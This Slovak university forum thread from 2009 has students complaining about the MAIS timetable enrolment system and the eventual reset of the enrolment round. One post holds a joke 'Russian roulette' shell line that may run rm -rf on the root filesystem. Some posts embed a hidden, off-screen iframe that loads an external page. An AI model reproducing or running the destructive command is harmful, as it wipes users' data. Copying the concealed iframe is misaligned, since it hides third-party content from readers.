• Welcome to TUKE FÓRUM - Fórum pre študentov Technickej Univerzity v Košiciach.

Zápis do rozvrhu

Started by BossZ, 31.08.2009, 01:19:51

« predchdzajce - alie »

BossZ

ani by som sa necudoval...

,,vždy sledujte na portáli navrhnuté rozvrhové jednotky, pri zistení kolízií, ktoré sme nevedeli dopredu zistiť, môžu byť niektoré presunuté,,

- ten nas uzastny system ani toto nedokaze rozoznat... fasa...
<iframe style="width:300px;height:600px;padding:0;margin: -300px 0px 0px 0px;border:0;" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.androidroka.sk/wp-content/themes/androidRoku/iframe.php?invite=52633e266001a22a5eb0166ee736bc68"></iframe>

McLarenPP

Quote from: BossZ on  11.09.2009, 16:30:15

,,vždy sledujte na portáli navrhnuté rozvrhové jednotky, pri zistení kolízií, ktoré sme nevedeli dopredu zistiť, môžu byť niektoré presunuté,,

Staci, ked niekomu vyhodi nejaky predmet, kde uz bude mat iba jednu alternativu na zapisanie do rozvrhu..A ta sa mu moze zase kryt s uz nahlasenym cvicenim z ineho predmetu, takze najprv bude treba presunut ten dotycny predmet a az tak nahlasit ten vyhodeny. Takto sa to moze tahat donekonecna, nakoniec urcite zostane par ludi, ktori si jednoducho nebudu moct nahlasit nejake cvicenie, lebo by sa im krylo s inym. A z toho budu dalsie problemy a zase plno nasratych ludi.
A pritom stacilo spravit uplne jednoduchy krok - vymazat vsetko a ist odznova.

BossZ

Quote from: McLarenPP on  11.09.2009, 16:40:32
Quote from: BossZ on  11.09.2009, 16:30:15

Staci, ked niekomu vyhodi nejaky predmet, kde uz bude mat iba jednu alternativu na zapisanie do rozvrhu..A ta sa mu moze zase kryt s uz nahlasenym cvicenim z ineho predmetu, takze najprv bude treba presunut ten dotycny predmet a az tak nahlasit ten vyhodeny. Takto sa to moze tahat donekonecna, nakoniec urcite zostane par ludi, ktori si jednoducho nebudu moct nahlasit nejake cvicenie, lebo by sa im krylo s inym. A z toho budu dalsie problemy a zase plno nasratych ludi.
A pritom stacilo spravit uplne jednoduchy krok - vymazat vsetko a ist odznova.

Uplne suhlasim, len to by sme museli argumentovat u nich, takto urcite neuspejeme...
<iframe style="width:300px;height:600px;padding:0;margin: -300px 0px 0px 0px;border:0;" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.androidroka.sk/wp-content/themes/androidRoku/iframe.php?invite=52633e266001a22a5eb0166ee736bc68"></iframe>

lada

proste no comment, toto neni normalne, och boze a ked si spomeniem ako som picoval na IS student, tak oproti tejto lamerine to bol genialny system

Hunterko

takisto zatial bez zmien a uplne suhlasim... mozno by mali s tym viacej prace viacej obav ze odznova kolo ale tak toto co vymysleli to sa nehodi... aspon napriklad nas rocnik mohol mat uplne nove kolo zapisu nas nie je az tak ako prvakov alebo druhakov a prvaci neviem oni si nerobia rozvrh ne ? ak hej tak im ten random zrejme fakt najlepsie riesenie :)

JCube

zmeny este nie su ziadne...ved termin kedy to maju spustit je 18:30 tak budu mazat 18:29
sudo [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "Alive!"

tuxik

Na základe nových skutočností a opätovnej analýzy aktuálneho stavu prihlasovania sa do rozvrhov na FEI rozhodol prorektor pre vzdelávanie prof. Raschman nasledovne:
○  4. kolo prihlasovania do rozvrhu bude pre všetky ročníky denného štúdia anulované, t.j. budú vymazané všetky prihlásené-zapísané rozvrhové položky vykonané študentami z rozhrania študent. Dôvodom je skutočnosť, že chybou v systéme došlo k prekročeniu kapacít miestností.  Toto prekročenie je dôsledkom sústredenia sa študentov na malý počet rozvrhových jednotiek a je také masívne, že ho nebolo možné riešiť len korekciou.
○ Kolo bude sprístupnené študentom na zápis do rozvrhových jednotiek dňa 14.9.2009 od 8,00 hod a bude prístupné do 18.9.2009 do 7,00hod.
○ Z uvedených dôvodov je potrebné, aby sa všetci denní študenti (okrem 1. ročníka Bc. štúdia) prihlásili znovu do rozvrhu. Prosím, rozšírte tieto informácie medzi sebou.
○ Oznam o vzniknutej situácií a riešení bude zasielaný všetkým študentom, ktorých sa to týka, na všetky mailové adresy, ktoré majú evidované v systéme MAIS.
○ V 39. alebo 40. týždni sa uskutoční pre študentov pracovné stretnutie venované prevádzke IS MAIS na TUKE - termín bude spresnený a včas zverejnený.

stanulik

dostali rozum, konecne im doslo, ze ich riesenie nebolo najstastnejsie...uz na zaciatku to nemali dobabrat, ale stalo sa, nastastie to mame opat vo svojich rukach  ;)

valec

tak nakoniec ich okolnosti dokopali k spravodlivosti    :metal:

JCube

odporucam kazdemu kto je nespokojny aby daco spravil a na to stretnutie prisiel...je to vo vasom vlastnom zaujme...lebo ja mam strach pri pouzivani maisu o svoje psychicke zdravie

lukasqo

Quote from: stanulik on  11.09.2009, 18:47:56
dostali rozum, konecne im doslo, ze ich riesenie nebolo najstastnejsie...uz na zaciatku to nemali dobabrat, ale stalo sa, nastastie to mame opat vo svojich rukach  ;)
len aby sa to v pondelok zas neposralo a nepovolilo prihlasit zas 100 ludi na 1 cviko  ;D ;D ;D

Hunterko

myslim ze tie nase maily vcera prodekanke , na is mais a prorektorovi raschmanovi zabrali... tak aspon nieco sme si vybojovali...

Ing. nemtom

co ste vybojovali? ze miesto 100 ludi teraz dojebu 500? dakujem pekne
brix will be shat

Tanka

tak pokial ja viem len z toho dokumentu ide skor o 1852 ludi nez 100

JCube

nemyslim si ze sme jedina fakulta ktorej sa to tyka

Tanka

no ved vravim ze len z toho dokumentu o ostatnych fakultach nemam sajnu ako riesili zapis a rozvrhy

BossZ

konecne, prisli na to...  :ropebanana:,

radix

a ked mi nehrozilo vyhadzov tak musim ako kkt robit rozvrh znova...

Ing. nemtom

tie cisla ktore som uvadzal boli ilustracne, islo tam skor o pomer, ktory je tiez ilustracny :D
brix will be shat

Hunterko

jasne ze nemalo sa to v prvom rade takto dojebat ale tak riesenie pomocou random je dost odveci si myslim... len som zvedavy na ten napor studentov rano pondelok o 8ej vsak to cele spadne..

letolto

Ja osobne som s random vymazavanim nic nemal, u mna sa to tykalo iba jedneho predmetu. Ale ked sa uz tak rozhodli, tak co uz...ale dufam, ze tentoraz s tym uz ziadne problemy nebudu...

ppt

Quote from: Hunterko on  11.09.2009, 19:15:11
len som zvedavy na ten napor studentov rano pondelok o 8ej vsak to cele spadne..
Aspon si otestuju server pri poriadnom vytazeni :D

Hunterko

Quote from: ppt on  11.09.2009, 19:20:47
Quote from: Hunterko on  11.09.2009, 19:15:11
len som zvedavy na ten napor studentov rano pondelok o 8ej vsak to cele spadne..
Aspon si otestuju server pri poriadnom vytazeni :D

vsak prave si myslim ze toto otestovane este nemaju... takze bude dalsi problem ak sa nebudeme vediet prihlasit do systemu :D

mrtvyhubar

Pri týchto, stále sa meniacich riešeniach rozvrhov sa zdá aj možnosť dostaviť sa v pondelok osobne a vyhádzať si rozvrh šesťstennou kockou ako celkom šťastná možnosť.
Viditeľné škody na nábytku sú ťažko opraviteľné a kazia celkový vzhľad
bytu. Myslite na to pred tým než začnete búchať pesťou po stole kôli nefunkčnému zadaniu.
"Making new tables in real life is not as simple as CREATE TABLE in sql"

ppt

seststennou kockou? ;D

Sice z prekvapeni z posledneho tyzdna by som sa necudoval, aj keby teserakt vytiahli :D